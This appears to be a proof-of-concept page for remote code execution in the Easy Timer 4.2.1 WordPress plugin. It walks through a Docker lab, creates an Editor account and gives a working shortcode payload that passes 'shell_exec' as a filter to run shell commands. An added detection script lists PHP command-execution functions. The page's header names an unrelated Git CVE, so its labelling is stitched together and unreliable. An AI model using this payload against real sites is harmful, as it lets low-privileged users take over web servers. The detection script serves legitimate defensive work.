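POC details: 73272bf67c1789f88d7365ccbf74c20873077216

Source
Related vulnerability
Title: Git security vulnerability (CVE-2025-48385)
Description: Git is a free, open-source distributed version control system. Git has a security vulnerability that stems from insufficient validation of advertised bundles, allowing the remote end to perform protocol injection.
Introduction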
# Easy Timer v4.2.1 - 

## Prerequisites

* Docker Engine installed
* Docker Compose installed

Refer to the official Docker docs for installation: [Docker Engine Install](https://docs.docker.com/engine/install/)

## 1. Start WordPress with Docker

From your project directory:

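```bash
# Start the WordPress and database containers in the background
sudo docker compose up -d

# Create the plugin directory and unpack Easy Timer 4.2.1 into it
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

# Restart WordPress so it picks up the new plugin
sudo docker compose restart wordpress
```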

## 2. Set Up WordPress

1. Navigate to `http://localhost:8000/`
2. Complete the WordPress Setup
3. Navigate to `WordPress Dashboard` → `Plugins` → `Easy Timer` and click `Activate`.
<img width="740" height="325" alt="Screenshot from 2025-10-27 12-52-06" src="https://github.com/user-attachments/assets/91f6d1b6-83c4-4781-b3fa-d5be4d218c3e" />

## 3. Add new user with Editor Privileges

From your project directory execute the following command:
```bash
docker compose run --rm wpcli user create \
  editoruser editoruser@example.com \
  --role=editor \
  --user_pass=P@ssw0rd!
```
(note: replace with your choice of user name, email and password!)

## 4. Create Post

1. Go to `Posts` → `Add New`
2. Insert a `Shortcode block` and enter:

```text
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
```

3. Click **Update → Preview Post** to see the timer execute.

> ⚠️ Note: Ensure you are using a **Shortcode block**, not a Paragraph block, for the shortcode to render properly.

<img width="681" height="278" alt="Screenshot from 2025-10-27 13-36-40" src="https://github.com/user-attachments/assets/00672fbd-9f1e-4a99-9508-f20f91488252" />

---
Congratz you got RCE.
<img width="944" height="620" alt="image" src="https://github.com/user-attachments/assets/2adc719c-4556-4a15-a216-9542a458c8b1" />

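A defender-side check for the shortcode shown in step 4, as an added example that is not part of the original README or the plugin: it scans post content for `countdown` shortcodes that set a `filter` attribute and flags values naming PHP command-execution functions. The `RISKY_CALLABLES` list, the function names `scan_post` and `scan_all`, and the sample rows are assumptions constructed for illustration.

```python
import re

# "countdown" and "filter" come from the PoC shortcode on this page.
SHORTCODE_TAG = "countdown"
# Assumption of this example: PHP callables that run OS commands.
RISKY_CALLABLES = {"shell_exec", "exec", "system", "passthru",
                   "popen", "proc_open", "pcntl_exec"}

OPEN_TAG = re.compile(r"\[" + SHORTCODE_TAG + r"\b([^\]]*)\]", re.I)
FILTER_ATTR = re.compile(
    r"""\bfilter\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))""", re.I)


def scan_post(post_id, content):
    """Return one finding per countdown shortcode that sets a filter attribute."""
    findings = []
    for tag in OPEN_TAG.finditer(content):
        for attr in FILTER_ATTR.finditer(tag.group(1)):
            value = next(g for g in attr.groups() if g is not None)
            # PHP function names are case-insensitive and may carry a leading "\".
            names = {n.lower().lstrip("\\")
                     for n in re.split(r"[^A-Za-z0-9_\\]+", value) if n}
            risky = sorted(names & RISKY_CALLABLES)
            findings.append({
                "post_id": post_id,
                "filter": value,
                "risky": risky,
                # Any other callable name still deserves a manual look.
                "severity": "high" if risky else "review",
                "shortcode": tag.group(0),
            })
    return findings


# Constructed sample rows standing in for (ID, post_content) from wp_posts.
SAMPLE_POSTS = [
    (101, '[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]'),
    (102, "[countdown date=2025/12/17-00:00:00]Sale ends soon[/countdown]"),
    (103, '[countdown date=2025/12/17-00:00:00 filter="strtoupper"]left[/countdown]'),
]


def scan_all(posts):
    """Scan every (post_id, content) pair and return the combined findings."""
    return [f for post_id, content in posts for f in scan_post(post_id, content)]


if __name__ == "__main__":
    for finding in scan_all(SAMPLE_POSTS):
        print(finding)
```

Because an Editor account is enough to publish the shortcode, the same scan is worth running over drafts and revisions, not only published posts.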



## Debugging Tips

* Check running containers:

```bash
sudo docker ps
```

You should see something like:

<img width="1174" height="121" alt="Screenshot from 2025-10-27 12-51-08" src="https://github.com/user-attachments/assets/41599c77-12b2-482e-b349-a79075e45ae7" />


* If shortcodes are **not rendering**:

  1. Go to **Appearance → Themes**
  2. Activate **Twenty Twenty-Three** (or another default theme).


* If navigating to `http://localhost:8000/` says **Database Not Connected**:
  1. Wait a minute or two for the Database to finish setting up
File snapshot

```text
[4.0K] /data/pocs/73272bf67c1789f88d7365ccbf74c20873077216
├── [1.1K] docker-compose.yml
└── [2.3K] README.md

1 directory, 2 files
```